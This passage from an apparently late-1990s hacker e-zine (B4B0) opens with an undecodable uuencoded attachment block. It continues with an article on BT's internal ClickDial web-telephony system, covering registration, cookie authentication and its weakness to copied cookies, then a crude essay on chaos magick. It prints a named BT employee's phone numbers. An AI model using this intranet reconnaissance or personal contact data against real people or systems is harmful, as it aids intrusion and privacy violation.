MCXS.PK_@UF#RG5^A7@%XU_^5K08N3T`[E*O5-DQ*^K%-0_'VW(IWZ$%TH7A[ M#ZAX]WBB=7S%ZSZ.-9K9]B-Q[O5!CK0..B\K=6O@5*H2`-O]*HZH:M[7]_>D M*AO`L<ZJZJQ#)5PLJ(Z2:BN><8Z1:J>S1EU:[O/ITI%%;\BITY&[8P$S+*A1

M@43J7=]G5J+<T=K+V=21.C_\O.I2H%?;W`,].E5PGO'[,=M7`BT0XDE'(^ZR MXS0ZTO'88,.&\AUOS'H#QVSP:=F]CY;C!.UXIV;UXZZ&Z%NG7<T)"#/<4Y#K M^&MW[..O>FM4,$S<1C\6:X*$2F[\C=.RTNY2QV)/01XS%4<\'.HX.1BV>:Y\ M2^P8I-!W(8X"Y9&3>].B1D(X;Q.>./FDC,\/PI[+!^D)[/\(*L[5MC8W;TQD M!VC(^1\\=!JX_SV5F>[_',1C[H&D\E>\X]'([%IR;:=2@'_IOUDQ4.0[HV"3 M.V!R8+Q*EHZFY>S:3KV^MN.KTK(.QI;$F)2BN*B#A]S5M@H>SUZ*JCT5=E!> MVXM1L[_`%\3X_:;?7_8G7/ZW)Q7^<5C\QS1(O27_V85I_,>#>2P!3*=3M@SF M4WE;#/%V`1!>:_^4:8Z=7&YMIU`$30"?N0Q\K\!G;6TG62"=LI/$[TGU5X7? MA:0H-\LT297#J+*ZU<QPN&D)E\$(PAX'+H=18+^S"+O*VLE7!^&OM\%@C(I_ MLNR"RV",CS^#FP2-7%E@,/0^Y/Q1^R#:F1TZMJPMU8[XC752-)]P&/5QV];; MY3"LMNTQ2N<GSV-Z&X6*H@?K&Z0-Y.N]T=1LTVPOF3-Y?>_\KOA4\N)`^DV^ M+ZG,_O1E(/TR87U4,/;.(YK<ZFUFQZ$K@V&W64BQ?*R?TF#E4-;R#*=,BEEC ME8JBJ5XV4V3M8=H"U,D6&?]6<BR_GF3U\2]?<,/`MD3_L.^Y-.`%G\6:JHM_ M!<"GFN4P`.],+0AK`6E9Q;8&M:-@R+;JKK8&M<-U88;1L;H0+$/IF4$T8S`6 MH&ZEQL><CW$:RM21%LEP>K+^*'G1:8=C9_2GR'#1^U6`.C5H<X'S&,H.UC/& M0Z-1KFS"Q'[4"HSF23XNR"]5P-&O,+U"O)HR>17[4X:\.N#A:_!RHB\^T^V# MY$7P;M&:0W-\CA+\*^0AA?,MGQ>Q+RFDKV_2!^FQ4,7?LW(5@G\XMI27-/MO M__D`HUP4.D_Q>J'.QK7`<<AD&0TPK5KE8ZSIEUR*X>AS>3'PY..'/(+?D4<0 M'LZ1B*.?-/51(<5YK,;:6N"X9.%[-J_JU3)FO7Q>\6.-\P>E9=CX(D[B=UV, M,<("6E53+EA<7A">71<^%[+,;C'2-?S*2)N,J=>Q'/:+^IS2REI]$?WPLPJ/ M!2YG..ZH2S,9S>[(L?:Q'P2;\QV-H08#99;QB_I+<EV`Y2F_8.7+-C3;H<9P M0/TMV\QH;7(\ZQ4.G\NIX(\%U-&U((]0O[B,"MKD;?[@?2DX^E+@NAS'1D\7 M<B3I*NPQGK8@]$:>\3':4"X>%CH(^2G)9:Z`^K8<'#\<9Z0]SDWXVX5O+J5D MG]K-A;>;X?I5T"7EBS8UN:TPO>NB"Z;GK734?:A/JUP'$;WM\4^:?X+?L7]U M/F<13ER?%JPZQ`=IWA?X3&79=^2U8%N</[#/1:8SLVDVA]AS$NKK?(KWN:;W M3>E";"?#>9SF68%[6<&D=,$;:<;?F2*G:5K1NUK@OP4.&5X^JW1QWN`[!H/& ME,N1J%LI!ON#\R?*$LU[!3;>0N920E_"7]G"0_!OJLIPJH3@@7`7I$Y1?:7Z M@AZ6+E#CHVA*_<[Q<2R:<'`^(%Q33#>*,4^3[M-XS.)#S,\Z]%F&VP#4=YP+ M\N8\)\;8S4N"+_FZ2]),V:<%1SU)3TV.TT+O(F\LH#XQ98YT2G6`/DF[])VR MZ91.X?HD[QAC;B\;^J00I`?.Q;+=,#UKZ!,U+JFRV:[0#X;,<_L%933K,UR* MG$_MN<.0>4.^7+I&V9;D#\@%943G-Y3_-(>;20L=Q^=]A_ZKZS);T'"PY@IA M)R?KEJ[0YNN:X'%-%RQH,I%)<YH*_B\X^+NJ^!OU=:6BQMFGM9":LVT<PWB7 MX&$?TD)_\G64R]8O:FUQVZ[@Y&$&`_D)=0O.Z0%^*@1YN%#7::1H*OI?S+*V ML`_95)#?A?V9X_9O6O-=!&S@I(/O`O,UXL7YHV*.G[`/Q*>0'\%KH\HMUK/A MNFUGS1ZS<$?YIK5+Q=4V;Y?L3;Y^T6SIC+5V$3J9=*"8*W.Z?:3T!ZT_>-L9 M/[SMC&97LG;Y'!5"4[&>*?!Y'_D=<19KG07-9R#:]\LA?.:@>=VW>(RWZ;)E MTMRV%#Q>"-"?XY%2N*!.#!T''1?4"S43CV32O:[7YQBQ=C5Y01L7CD>M'DX3 MUWI?U^L5R[\JZ6/IE72`;AH>VMQCK_MJ87JAJOA#IU.Q$,1G@:\;#'JX\%@( M&SN%#\(/XJ/Y8?A\@&VB?@_P*M?IQ8#N-7VP]CR/Z]-A?"M\%SE?Z;ER,LB; M8;J!M:76R$/;P[5S5ANW@M`%:GVKZUG2\64'S(+>!Z"AQF.V3A<\FZ^-`HOK M#]^:'\H,EI%6L.#7!7S3Y@_2''XOL#G6]NV0WR>-M@Z#4:MH>M)>K_%Q1ONA M7G3T*ZOF?=?X)04N]4%CK.;;<CZ$?MDUYQR)?0O0@_.5\&'E+)V(\XS;?Q7T M:PL?5I;;A@'_:Y+[XU+,!Z>O*Q&'JF_2PO`'+RC;RBQGZE.]+.KEJM:7:IGQ M5J`<EQ>]K.WKEV6S9KFRV./1]]9$V:19EOA5@VG;%;K,);5Q0U^?,<YHQ^6# MO%S/KQE^!]]A;X@Y9\':YY)K`J1MV5PW#)I?JY:M*^:.>C5(4^'[+7#;O98T M\R0.93>?HJVLX)NP;1ND*M?F#`;J:AU/T9:?,F6UHO&6^-/7<]+GBKY12U^0 M?LQ8LL]M4)_S1S7,]VG1=2'C&CLE^ZB'ZIJLZCXW\;V:8[1(:F-=X>N&6G'ML*F+B/,"PQUQ+N;8^+CPE7JLQLI1WY-FGXO<GM7K"ULG[;+':L'RPB8M<C^P MD9=6\UPVY:9YK1J"O\M/YW,YMGG9@9?P(U:ESE)\*O:7Q-I8Z/J`WLHPWS7R M&RO#Q\76@W5>+F?IB[2BC0L/L;8D/XL8#R<-&?\I^BE_4)B.P3DJO\#'LVK1 MK*9DSK?ZK,MXK6SQ;V!LE`U#\YB0^X)#IXB\@+[5?#D.W6W4K3KRM+Z$Z2O) M(S9MQ9X'VH=%MSY-Z38(MWLHWS'/^6*_,J^5L7A%T)9TF(NV644/IWQSO5%, M#](AW*8K[E&'D+VA]AK)GR_T7HWYRG7=F^&^1EN6I1\FK60N*`]*ALA&3"L9 MISE:VRNP93R94OTP95WO!_:!K[.%SK'ZB[);2['Y0HR=A"%U6W!ND'N4:7,L M7?.3L7[)FG**;<KU1]*$)?8VA>U7+CCP0#N[R.W`@ML6K!CG.Y2\$-_F>#_P MMP8W[:LYD_I8U/.X[`/>^2+;RT(?'OH%L![*2I[;QMC>_IQU##W_-['3?WLZ M_Y?-IJ?G_P[BF9[_FY[_&X5.P77P]/S?VO3\WX3Z,CW_YVJ/VRG3\W_3\W_3 M\W_3\W^YZ?F_Z?D_01NUII^>_[/DMC(]_S<]_S<]_R?YMKXV/?_GTK.&/E'C M,CW_-SW_-SW_MS8]_S<]_S<]_V?CH<T]T_-_[GE^>OYO;7K^;U;9I-/S?TH' M3<__F3(W/?\7Y-/I^3\E^]/S?]/S?]/S?VO3\W_3\W_3\W_3\W_[\`3._VW3

M?><3//TW-/YG*I?,:>?_\GC^+[F0G)[_.XAGLO?_CGZ9[W:Y*6^HLJ_9S>#] M(2/>N<O85=VVVVQ7O<L`_$KX!4,$^3@TPR&[;[E]986JVU=5.>ZJ<MZ3IF)@ ME[5;?>/.Z->N\-=.H.JZ*^BA#-6.]Z?KEUVQWP;@`9>ZB2C/\KX.O+;]B)?. MY=AE&C)@,A5G=[I#EQKB%N*X>>&7@X9[N2=X'/*-$>=^#-H-C;+^HQ%).J#_ MFXUM?ZY3KK'$N8H_=[W<;?FU!V@#]']VP/V?J73.OO]S(96:WO]Y(,^GEL^\ M\-!##\G?#\\\,H._OOXW'SV4A<]_\01+S\YXD!>;^8F91V=DZ3<>/81_IR,S M,_CW(4R#\IC_!GR^\7<>/81_HOAC/#_US2]BD7__QM=>OO,GJ[M7#GWQK]#/ MW2OOW?GNE:^*Q#E'XN[9Q[_8=!6..A(/?P%*_W)(QN$OO/S$%TLA31QQI^]" ME;OA61]R(?98>/F?"L]Z)#SK42OKT]]%FKYR:35U_[?Q6_'*$]NG[[XU\[W[ M]S?P]Z7=EP^MW/OU^_?OW_K=QX]CRM::R'A\Y=X_TC-.?OH=_/ST5SF@ZV_O M+C\1?_<"`\<@K4*%.U^%*K>_^?I/K3(@GX"TXC>V'DU]Z3L?HK&]^QM_]K_N MW[_\RR6)Y#^<(21WK_STU9E[?_V'`./VZU#KG=N=^^SYTW\&I/KL\J]=S=Y= M_MH%Z.Q+]^[]$'%[XM:[V<.WOP4D^?3-KR&_'K[]'^%'?7?YC^NWOO3#^JUW M'SK\M[[,4OXK_'JD'X5_'SM\^[<@[=;-;SUT^/8_@6^[R]_>W7KBSJ.9PU]8 M?O?+W_K0G>4W=]]&%!YZY\[;._`)Z>_=??2-+W_KD3O+;]SYP4-?7;WW*W^! M"#Q:_,;AVW\#0=S%\G?N]N'?JP#PWH7=K<<OW3M":#Y^^TN'/[.(I6Z^^0HK M^=*E>T^SO.*[AV__/.:]11#>:L*_J6^^<WL#/E$JZK=NOCMS^,W/PM<[_^?6 M5SY\ZVW*Z4<^_?SW<"R^4]Y]&^O<^H6'MB[=^N3W9K8N[#[_7O'AP[=_[^&9 MF4>>_[,[MVN0_?3]PS,S_PHKQ+]\Y_>*RQ\^_-G?A/S=K9][Y"W,O[/U;:BV M^\GO89^QA4>6/WP'$LY^^*'HK:]XMVYC&]Y)I%#QJX<_LXTM,DP.OUE"0'?Q M!Y!Q]Z9WY_$%I,%W&0UF_T+2((\%;[X!--AA-'CR+R0-?N9A%'_H[7LS_7.[ MG\,"T%OL"I'B>O1#B#R@])V/[*89F>Y\[Y'GWRU2][8.0]=A./\06.R1K0_? M2=_Z2@R1?:_XU==_>_?F=^^\C:48DL7?[T88-]^Y^=V[RY]A:+[U`T3E$*+Y M60`"=?_>A8T3B/#RKUVX-_<>LF7GONS*-2AS%?Z[=._Y]V3B)4QD3/HVEGWE MWF6627Q:@-S=LV^^M/L6<LFE5^X]QS*+RV\>OOVS!&_WRINWOII=W;WY^"OW M_N</)-P?PN#O$AGBW[BP>Q=!O_3*O9^1#=_^+U"`)!<&X))H^[_]0,GOX=O_ MFF`@%8X1I`NOD"#]D6SE]N>QQ-8;4!^)_PIOY][G68GB][8^B0B^\<BO(Y!5 M(MH+HO;KO[R[_(\1.=;VI7LW1<[6J=VSAUXB(K[UYYS$KR>)O*_<VY0I/P\I M_^`"_/-Y2&[_N0#[$[^-.N,[#Z>^R>3CTKUWOT^"=XL:FGG]L.CM/Z4ZCU)# M#\'W.]^X^QL?OV]JFE],H::YL/K2RCNWO_%U)E_OW/Y#^>V]W[]__]\=PF_O MPC=4T._<_C/X]EN4]CWX=N$Q-NR[RX<NW/MI;.;?(J+_]_!G_@<-X,:O`J!+ M]^;_7([=[^*H$^0+=V_/_`%\7+IW%"M^A:4B:;]R^/:O/X3U_CMT[G?NDPZY M.O.G_QS2[OW+[R/G?>OKI.\08(\:NO?-=^_?!YUT]]%_4_RK(-G_"3CU[_^_ M[]_YW!]0R4?O?F[F6U#Q<U_[.BI[#P44O[ZT^SD$M7+O!(']XZ\+//_VH8=$ MF3MW?P_^38$6NO4VTN:13_W.K;>17(<_]1;@]?#NYS#_UE>B=S[W)8+UQ/<E M'5Y?WW@<`-V]_>VO4T__\[N\@9O+NT34"[N,CKM$V`L697;O(L27[GV;!OGG M;G^I?^@^C<]W'KM/(W;IWN^\R\:9.GKWT;_K),"=;YPL_L'ANXLH[6]C)[<> M3MUG>!_^PO.''GJ']?2A[[.^8O';6.]3_^%/'T,]P8FT\BX?#F@0^O;8I7N_ M""FI+]W]C=^$_$^\>OGCQ%QO]\'4N?\G]RZ`1I^?N;<"R,]O-S+I+-Z$/!EC M;/I,G^DS?:;/]/EQ>>9[-S;[Y0I\]KOL<T-\PPM,9^;Q:L&9^4JO-S+(GYUA M/@A<>N.DC7Z;/SJD\A_EGT_R<KC8)E_%$R8<4>ZC\'=HA'(_R<N(!\LEM-\/ M:9\/:^F_"Q6_Q/']"0X/FXA8\-[\:PP7&Y[KP7[/4'U62OAA'N$MJ]^/&/4> MD;T1OS]D_7Z,(/XJA_^3,__[_B&MO2<@][`&'_-_UOH]:_V>*?DTU"5TQ<%' M"09;?/=I^$M^ZT$<D--G^DR?Z3-]IL_TF3[39_I,G^DS?:;/])D^TV?Z3)_I D,WVFS_29/M-G^DR?Z3-]IL_TF3[39_K\B#[_'VOX5H$`N`$` ` end B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.3.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 "All my life, I've always wanted the substance that I found lacking... The need. The desire. With B4B0, I have all that." - Anthony Michael Hall, 1998 B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.03][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

-] BT ClickDial -] Web-Enabled CTI -] - gr1p For more information on CTI as a general concept and its implementing ideas I'd recommend checking out Hybrid's text file on CTI, released under 9x last year, the url is at the end of this text. For even more info regarding CTI how about searching altavista? :) BT docz > * ciao. --> Introduction BT devised the wonderful idea of combining CTI (Computer Telephony Intergration) with the Internet to create a WWW/CTI which would provide access to a wide variety of data including telephone directorys. The ideas behind this were trialed at BTL (British Telecom Laboratories) to test the concepts and usability of the service. The basic idea BT has is to take their existing Directory Database, Teamconnect, which is currently accessable via HTML on BT Intranet and intergrate the HTML-based information with the CTI layer to enable calls to be dialled and answered at the click of a mouse. The Teamconnect Directory contains the contact information for BT employees, including PSTN and BTnet telephone numbers, pager and fax numbers, e-mail addresses and physical location. This directory, with added ClickDial features is shown in click1.jpg in the attachment of this text. The link between the intranet page and the telephone is taken by the CTI service, named ClickDial, this then takes the telephone number information from the webpage and turns this into a call request to the appropriate telephony equipment ie. PBX, giving it instructions to set-up a call. --> ClickDial Users and Registration From click1.jpg its pretty obvious to see how this is implemented via an easy to understand point'n'click enviroment. The user types the name of the person they are looking for via any of the search engines implemented into the Teamconnect Directory. On a directory listing, such as Eric Allard's (Devel. Manager, IP Engineering) listing in click1.jpg you will see that the numbers are listed in numeric form, next to a ClickDial button, which is obviously where the WWW/CTI Intergration plays its part. For BT Employees to use ClickDial they must be registered, which can be achieved from the intranet webpage, but as yet, registration is not open to everyone. BT conducted a trial at the Main Lab Block @ BT Labs with a random selection of 1000 lines being accepted and allowed to register. The registration details etc. are shown in click2.jpg and click3.jpg, click2.jpg shows the Trial registration screen with click3.jpg showing the screen of a registered user on the ClickDial system. To register the user must obtain there 9 digit registration number which is given to them via the webpage when they request registration to the service. They are then asked to call the ClickDial Registration line which answers.. "BT Clickdial. Using your Telephone keypad please enter the 9 digit registration number appearing on your screen" If the user was among the random selected 1000 numbers clickdial services would be registered from their line. Some users who tried to register were

turned down for not having a suitable line or PBX for ClickDial services. When the registration line is called a CTI application answers the call, plays the above BT announcement and reads the 9 digits the user is entering via an Interactive Voice Response Unit (IVR), this then determines the Calling Line Identity (CLI) of the user and then passes the 9 digit number and the CLI to the ClickDial server. If the server recieves a valid CLI and a 9 digit number which matches the one sent out by the browser the CLI identifies the telephone to be associated with that browser meaning that the user must use the browser and telephone simultaneously which is meant to prohibit security violations of ClickDial. A database allows PBX's to be identified from BT's Internal CLI's. Multiple registration requests from the same browser also need to be recognised. This is done by including a temporary registration cookie on the registration page containing the 9 digit registration number. When the user clicks to continue their registration from the starting registration page the request to the ClickDial server includes the temporary cookie containing the 9 digit registration number which has just been set. If a valid CLI has been recorded against this number, the server returns details of the telephone number, location and PBX type (as shown in click3.jpg). If ClickDial services from that PBX or line cannot be offered, because they were not in the random selected 1000 numbers for the test for example, the registration cookie is simply removed. However, if registration is successful the cookie is removed then replaced with a long-term ClickDial cookie. --> ClickDial Security The ClickDial cookies mentioned in the last section contain a name and password which however the user doesn't have to be aware of. The name is simply constructed from the PBX and Telephone number of the user as determined during registration and provides a pointer to the user's details, which are stored on the ClickDial server. The password is a 32-bit random number generated by the ClickDial server and stored with user details. When the ClickDial server recieves a request to make a call it expects to recieve a cookie and the number is then dialled. If the cookie is missing or cannot be interpreted a page is returned to take the user to the original registration page. If the cookie is found to be a first-party cookie the number is dialed and the call is made, otherwise, the recieved password is checked against the password stored on the ClickDial server for the recieved name and if anything is found to be non-matching a registration page is again shown, and no call can take place. BT's argument for this method is that it can be made as secure as required against forgery by incresing the size of the password. but it offers no protection against copying cookies. A check could be made against the IP address of the browser making the call request however this would fail in the case of machines using DHCP (Dynamic Host Configuration Protocol). Normal PC and Network Security precautions are enforced to minimise the risk of allowing a cookie to be copied. (Check out the Psyclone/MED file on BT WorldWide Networks Security, and the Juvenile Delinquency file on Computer security, URL's listed at the end of this text). There are several methods used by BT to combat fraudulent use/activity. A transaction log which records the timestamp and IP address from which each request originated is kept on the ClickDial server. A user who suspects their telephone and account is being used by someone else can simply access the "Cancel Registration" webpage on the intranet which will immediatly invalidate all existing cookies associated with that telephone. After

cancelling registration the user can re-register with a new cookie which BT say will now be the only cookie for that line. BT suggest that, Basically ClickDial registration, using both browser and telephone gives greater security than either a telephone line/pbx or computer can give separately. --> ClickDial Networking. In the ClickDial users and registration section above I went into brief detail about how a call is made. This is best shown in an ascii diagram of the network structure. ------| First | | Party | | User | -------\ | \ | \ | \ PSTN \ or \ PBX. --------------| | | | ClickDial Server | | | | ------| Third | | Party | | User | /-------

--------------/ | / | / | / ------------------| | | BT Intranet | | | ------------------/ | \ ------/ | \ | Phone | / | \ ------/ | \ | / | \ | / | \ | ----------------- | | PBX | | IVR |--| PBX | | PBX |-----------------| | ||| | | | --------------- | ------------ | | BTNET | BTNET | PSTN PSTN PSTN

Its clear to see from the diagram the whole structure of the BT ClickDial networking, and how everything falls into place. Two things you may be unclear of however are the "First" and "Third" "Party Users". This is basically two different ways to connect to BT Intranet. First-Party users has local software/hardware that controls their own telephone line, they have no control over any other line. They could use a wide variety of software to connect to BT Intranet, including The BT Callscape product that sits between the telephone line and the PC's serial port. For more information on BT Callscape check the url at the end of this file. They could also use other applications such as Video Telephony Cards which will make video calls where avaliable, Modem's which are common and PC Interface cards in special telephones such as Nortel's Meridian Commmunications Adapter (MCA). Third-Party users have their telephone controlled by a server acting on their behalf. Their telephone line is connected to a PBX which

in BT ClickDial is controlled via a WWW Interface. As you can see, each PBX is connected to both BTnet and the PSTN. The difference between BTnet and PSTN numbers is pretty simple. Easily demonstrated in click1.jpg with Eric Allard's profile. PSTN # - 01473 645740 BTnet # - *7 164 5740 For more information on BTnet check out the BTnet PocketGuide typed up by Juvenile Delinquency, URL at the end of this text. Glossary of terms in the diagram.. PBX - Public Branch Exchange PSTN - Public Switched Telephone Network BTNET - British Telecom's Internal Network. IVR - Interactive Voice Response Unit --> Future I talked of the random 1000 number trial at Martlesham in this text. It should be noted that the trial, was spread across three Meridian PBX's and two BT sites, being BT Laboratories and Eaton Court. The experiences and results of the trial have directly helped and led to the network architecture design for a 20,000 user ClickDial system which will be deployed gradually throughout BT supporting various browsers with improved registration resources, call profiling and overall system performance. It is an aim that ClickDial can be intergrated with proprietary contact databases to allow first and third part CTI users to dial any number efficiently. Because of ClickDials WWW/CTI interface phone numbers become more than just phone numbers that can be cut'n'pasted into documents, they can be seen as URL's and pasted as a url into e-mails and documents using html, or even as an internet shortcut into e-mail/browsers. --> Links Hybrid's file on CTI - http://www.ninex.com/9x/rawtext/9X_CTI.TXT Psyclone/MED file on BT Network Security - http://www.maneatsdog.org.uk/med-wnsp.txt Juvenile Delinquency file on BT Computer Security - http://www.angelfire.com/tx/e4/JDSPA12.txt BT CallScape - http://www.callscape.bt.com/callscape/cshome.htm Nortel's Meridian Commmunications Adapter - http://www.tcscanada.com/meridian/MCA.htm BTnet Pocket Guide (Juvenile Delinquency) - http://www.angelfire.com/tx/e4/BTNET.txt I apoligise for the size of the zip attachment with the jpg's in, but they are worth the size. :) werd up to IBTE, hybrid, psyclone, Juvenile Delinquency, 9x, and Eric Allard.

- gr1p B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.04][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 Lifting the skirt of a girl called Reality - ----------------------------------------------or basic procedures and theory in Chaos Magick. compiled by Synner 1999 (synner@hack.gr) o blurb In this textfile I will try to shed on some light in the misinformed and dark area of Magick. I will try to be brief as possible because Magick isn't a subject that can be solely covered in one article. To be more accurate, this textfile is about _Chaos_ Magick solely and not for the other archaic pre-established Magick systems and dogma. Do not continue reading further this text if: a) You want to turn your enemies to frogs, cast fireballs, and dominate females in order to get some, or you think you can really do such things on the spot, without the help of Industrial Light & Magic (tm) :P. b) You want to setup cool "satanic" rituals in order to attract females with IQ resembling to an oyster. c) You blindly follow a certain dogma, stuck in one mode of thought. o The Four Models Different systems of Magick seem to have different models depicting everything. The predominant model of Magick was the Spirit Model. Gods, Goddesses, Entities, Elementals, Angels, and such are real spirits residing far from the human reality having a seperate existence from those who dare to deal with them. The Energy Model was generally aroused in the West, in the discovery of electricity, science, and magnetism blending Eastern philosophies as Tantra, etc. Gods, goddesses, and such are considered subtle energies which take the form of entities when viewed from a limited human sense, and which are not separate, but merely took form so as to work with them. The Psychological Model grew out of the arise of Psychoanalysis, particularly the work of Carl Gustav Jung, and has come to be the dominant model for explaining Magickal phenomena. In the Psychological Model, the gods, elementals, demons, etc. have no existence beyond the human-mind; they are merely symbols or archetypes of deep parts of the human psyche. The Cybernetics Model is just beginning to creep in as magicians begin to speculate about the nature of Magick as revealed through the lens of Information Sciences. As yet it remains incomplete, but a cybernetics-based view of magical entities might say that they are information systems including personal belief, group belief, enviromental systems and the very fabric of reality itself.

- -

o Goddess Eris. Thousands of years ago, Ancient Greeks portraited the force that drived the clowns and fools into happy anarchy, dancing madly clowning around and the laughter of children (and not the primal Chaos summerians had) as Eris, The Goddess of Chaos. Eris is the Queen of confusion and weird synchronicities in everyday events. She is present in all events that have absolutely no rational explanation and it is said that she has a bizzare sense of humour. Basically she was a way cool chick. Ancient greek mythology depicts the confusion Eris have created when she gave a present, a golden apple that had inscribed the words, "to the most beautiful" to the three Goddesses, Athena, Aphrodite, and Hera. All the three Goddesses claimed the apple as their own which that led into a wild fight of which of the three was the most beautiful. This led into the Judgement of Paris, the outbreak of the Trojan War, and a major turn in Greek History. o What is Magick and what does Chaos have to do with it? Magick is the _science_ and art of influencing/changing/creating the outcome of a future event in reality.Its not a religion, but it must be considered rather as a science, or even art in some ways. It is wise here to pinpoint that there isnt such thing as Black or White Magick, it's rather symbolic. Black or White are the goals of each individual who wishes to achieve through Magickal means, and yet this is rather subjective, if you connect Black to some "evil" deed, and White to some "good" deed, but that comes down to social/personal structures that have established the right and wrong, the evil and good. Magick should not be viewed as something of supernatural or metaphysical; it's part of the Nature as Chaos that is present in all the Cosmos. Modern Chaos Magick from the other hand was developed (and still is developing) and established in the same timeline when the Chaos Theory and non linear mathematics started to flourish in academic areas. o The difference between the modern chaos Magick and the prestablished ancient Magickal paradigms. Contrary to the pre established archaic Magickal systems and dogma like Kabbalah, Hermetism, Enochian, Satanism which most of them are religion and not only a pure methodological system of getting things done, Chaos magicians do not follow blindly a dogma, with its rules, restrictions and "must" methods. Each individual Magick user develops his own system of methods, deities systems and so from scratch or by borrowing pieces from the other paradigms mentioned.This gives him more freedom and a more personal way that fits him most when applying Magickal acts. For example: One who practises the Kabbalah (Magickal system based on the ancient Hewbrew tradition and the Bible) cannot do Magickal acts based on other Pantheons (such as Summerian, Egyptian, or Ancient Greek), simply because he must follow the way that Kabbalah textbooks describe. Simply because in Kabbalah there is not such thing as a Pantheon, rather than a single God, angelical beings and evil daemons. Chaos magicians are free from themeselves to do whatever they want worship any deity they wish, and so on without having restrictions about what they can or can't do. It is merely a state of mind and attitude that makes a Chaos Magician be what he is. The only rule for Chaos magicians is that they have no rules. o The symbol of Chaos.

All Chaos magicians and not only use this symbol in order to meditate upon draw energy or to use this as a tool for summoning certain deities that are in some way related to Chaos (such as Azagthoth, etc and most of the summerian pantheon). The aforementioned symbol is an 8 pointed star. Fig.1 / \ | -| / | \ | / <------O------> / | \ | / | \ | -- | -\ / -| \ Please excuse my lame ASCII art, but I think you got the point about how it looks and I am sure that you've seen it somewhere before. o Programming in a broader sense of meaning. Mostly, Magickal work is done by programming the psyche of oneself. Mages beforehand fortify emotionaly themselves, drawing energy and feeding it their emotions visualizing the desired outcome of the event while in the end launch this virtual emotional mass of energy directing it into something that is symbolically linked to the desired outcome. In mostly all Chaos Magick sourcebooks everything is considered as 'programming' while the universe is considered as a gigantic interlinked network with an operating system and reality beeing the output of the processes that run in the background. It is all symbolic of course. o At the heart of it all Rituals are the most powerful (and glamorous) ways of doing Magickal acts. They are a series of constructed events in order for someone to manifest Magickal energies towards the desired thing. Rituals can be used with robes, incest, candles, banners, symbols and gestures and such or with on the fly pure improvisation. Generally 4 keys play a serious role in a ritual. a) b) c) d) Atmosphere. Will. Exact intent. Visualization.

The ritual is consisted of 5 stages. a) b) c) d) e) Preparation Warming up. Core. Winding down. Debriefing.

We will discuss them all analytically.

First, the thing we should remember before setting a ritual is that we MUST have a EXACT intent of WHAT we WANT to DO. Example: (forgive me for the below but that's what popped in my mind) I WANT TO FUCK JULIE ehm... good but not enough... let's try better: I WILL FUCK JULIE That's more like it. The second key we have to make sure is that for the desired event to happen; we must purely want it and not want some other thing in the same time. Thats called pure Will. Example: A thought like this won't do: "I will fuck Julie, but if I don't and end up fucking Mary, it's ok." I... think you got the picture. Another thing we must have in mind is the atmosphere of your surroundings. Trying to cast a ritual in your bedroom while having your parents, aunts, uncles and kids in the other house celebrating laughing, playing music and generally creating unwanted noise isn't the best. Preferably you should try to do your work in a secluded place, creating atmosphere with incense, candles, putting on a tape with drone/isolationist music or mantra's and everything else that you seem proper and fits you in order for you to be in the right state of mind. Last, but not least, visualization. In plain words, fantasy, seeing vividly that you want to achieve before you, happening, taking place. Visualization is the most important factor I think in getting everything done, it's a valuable tool. After we examined the key factors one by one, we move on to talk about the stages a mage passes on when casting a ritual. a) Preparation Preparation is everything one does before doing anything: cleaning his workplace, lighting up candles, incense, bathing with aromatic oils, creating atmosphere for his workings and so. b) Warming up This stage is when the mage firstly casts a simple banishing ritual to relax, clear his mind and induce himself in a trance state called Gnosis. This state can be reached through meditation, vibrating mantra words or monotonously repeating a phrase/word until that word becomes meaningless and plausible, or alien, drumming or dancing. I am not quite sure about the usage of drugs in order to reach in that state, marijuana however is not suggested because most of the time it doesn't help you clear your mind rather than flooding your mind with millions of thoughts and memories. You have to stay focused.

c) Core The stage is when the mage after reaching the Gnosis state and begin to commence the technics which were implemented for the main intention of the ritual so far which is powered by all the energy and enthusiasm that was gathered from the start of the rite. That may involve calling a deity, launching the gathered energies towards an object that was symbolically linked by the magician and represents the desired outcome and so on. d) Winding down This stage is when the mage is trying to return to himself, drawing away the emotional fortification he previously had, releasing the tension and exiting from his trance state. It should be noted that the more intense the ritual was the more thorough the 'wind down' must be. Most Chaos magicians either do this by laughter or forcing themselves to vomit (not suggested) in order to bring back themselves in the everyday state they were. e) Debriefing The debriefing stage is mostly a post-ritual stage where the magician merely records anything he wants from the ritual into his personal diary for further study. This may vary from wierd feelings one felt during the ritual, something that happened or anything that the mage feels that must be recorded. o The Guardian of the Threshold. You gladly followed the text until this point. After reading the aforementioned words I am sure that from time to time phrases like this popped into mind: "It's all bullshit, why am I reading this?" etc. Well, that's your guardian of the threshold. It's a nasty beast that lies in the core of your own personal programming that was done by the society, family, surroundings, and etc. that wakes up every time a paradigm shift small or large occurs in you. The most formidable opponent a mage will encounter is his own inertia, resistance to change; Ie. the little phrase of "ah well, I will continue tommorow" or "what am I reading now? It's all crap." This demon is spawned when one is practising something, and in the process leaves the interest he had about the subject or the infinite loop of "I'll start my diet in Monday". We all know. The best tools you have to defeat this is determination, effort and dedication. o Pathways to Manifestation Using Magick to increase the probabilities of something to occur one must have something in mind. You must create pathways for your Magickal energies

